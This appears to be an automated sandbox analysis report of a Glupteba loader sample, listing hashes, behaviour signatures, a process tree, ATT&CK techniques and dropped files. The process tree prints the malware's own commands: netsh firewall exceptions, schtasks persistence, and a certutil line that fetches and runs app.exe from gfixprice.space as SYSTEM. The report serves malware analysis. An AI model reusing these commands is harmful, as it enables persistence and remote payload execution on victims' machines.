Analysis

  • max time kernel
    108s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 03:53

General

  • Target

    51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1.exe

  • Size

    3.9MB

  • MD5

    35bfa27c042d62f9fb7f4238ecbe0ae9

  • SHA1

    53e9da79c2aa02fd95ebb24f968fa4c0bdbc96e6

  • SHA256

    51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1

  • SHA512

    72682cfb63ba025aadc345ca83d10e4fd2c8d8c88c8c015fb91f44ca263854a1c61e5bd66e01f7c20c58b1509e9ce4e4ad8e1cc90acf8ab3e635602a6b99163e

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1.exe
    "C:\Users\Admin\AppData\Local\Temp\51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3996
    • C:\Users\Admin\AppData\Local\Temp\51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1.exe
      "C:\Users\Admin\AppData\Local\Temp\51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:480
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:4220
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\85edacfd9338\85edacfd9338\85edacfd9338.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:372
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\85edacfd9338\85edacfd9338\85edacfd9338.exe" enable=yes
            4⤵
              PID:1720
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:112
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:3592
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:3956
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2132
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:4164
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 596
            3⤵
            • Program crash
            PID:4392
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4428
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 480 -ip 480
        1⤵
          PID:260

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Scheduled Task

        1
        T1053

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Defense Evasion

        Modify Registry

        2
        T1112

        Install Root Certificate

        1
        T1130

        Discovery

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          Filesize

          1.7MB

          MD5

          13aaafe14eb60d6a718230e82c671d57

          SHA1

          e039dd924d12f264521b8e689426fb7ca95a0a7b

          SHA256

          f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

          SHA512

          ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

        • C:\Windows\rss\csrss.exe
          Filesize

          3.9MB

          MD5

          35bfa27c042d62f9fb7f4238ecbe0ae9

          SHA1

          53e9da79c2aa02fd95ebb24f968fa4c0bdbc96e6

          SHA256

          51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1

          SHA512

          72682cfb63ba025aadc345ca83d10e4fd2c8d8c88c8c015fb91f44ca263854a1c61e5bd66e01f7c20c58b1509e9ce4e4ad8e1cc90acf8ab3e635602a6b99163e

        • C:\Windows\rss\csrss.exe
          Filesize

          3.9MB

          MD5

          35bfa27c042d62f9fb7f4238ecbe0ae9

          SHA1

          53e9da79c2aa02fd95ebb24f968fa4c0bdbc96e6

          SHA256

          51431c3bc4e4e4fdfae11f136be031b6ef5fd6747df45ec2261a733fcf6411b1

          SHA512

          72682cfb63ba025aadc345ca83d10e4fd2c8d8c88c8c015fb91f44ca263854a1c61e5bd66e01f7c20c58b1509e9ce4e4ad8e1cc90acf8ab3e635602a6b99163e

        • memory/112-144-0x0000000000400000-0x0000000000B10000-memory.dmp
          Filesize

          7.1MB

        • memory/112-143-0x0000000001200000-0x00000000015A6000-memory.dmp
          Filesize

          3.6MB

        • memory/112-140-0x0000000000000000-mapping.dmp
        • memory/372-138-0x0000000000000000-mapping.dmp
        • memory/480-135-0x0000000000400000-0x0000000000B10000-memory.dmp
          Filesize

          7.1MB

        • memory/480-134-0x0000000000D9A000-0x0000000001140000-memory.dmp
          Filesize

          3.6MB

        • memory/480-133-0x0000000000000000-mapping.dmp
        • memory/1720-139-0x0000000000000000-mapping.dmp
        • memory/2132-147-0x0000000000000000-mapping.dmp
        • memory/3592-145-0x0000000000000000-mapping.dmp
        • memory/3956-146-0x0000000000000000-mapping.dmp
        • memory/3996-130-0x0000000000E9E000-0x0000000001244000-memory.dmp
          Filesize

          3.6MB

        • memory/3996-132-0x0000000000400000-0x0000000000B10000-memory.dmp
          Filesize

          7.1MB

        • memory/3996-131-0x0000000001250000-0x0000000001945000-memory.dmp
          Filesize

          7.0MB

        • memory/4164-149-0x0000000000000000-mapping.dmp
        • memory/4220-137-0x0000000000000000-mapping.dmp
        • memory/4700-136-0x0000000000000000-mapping.dmp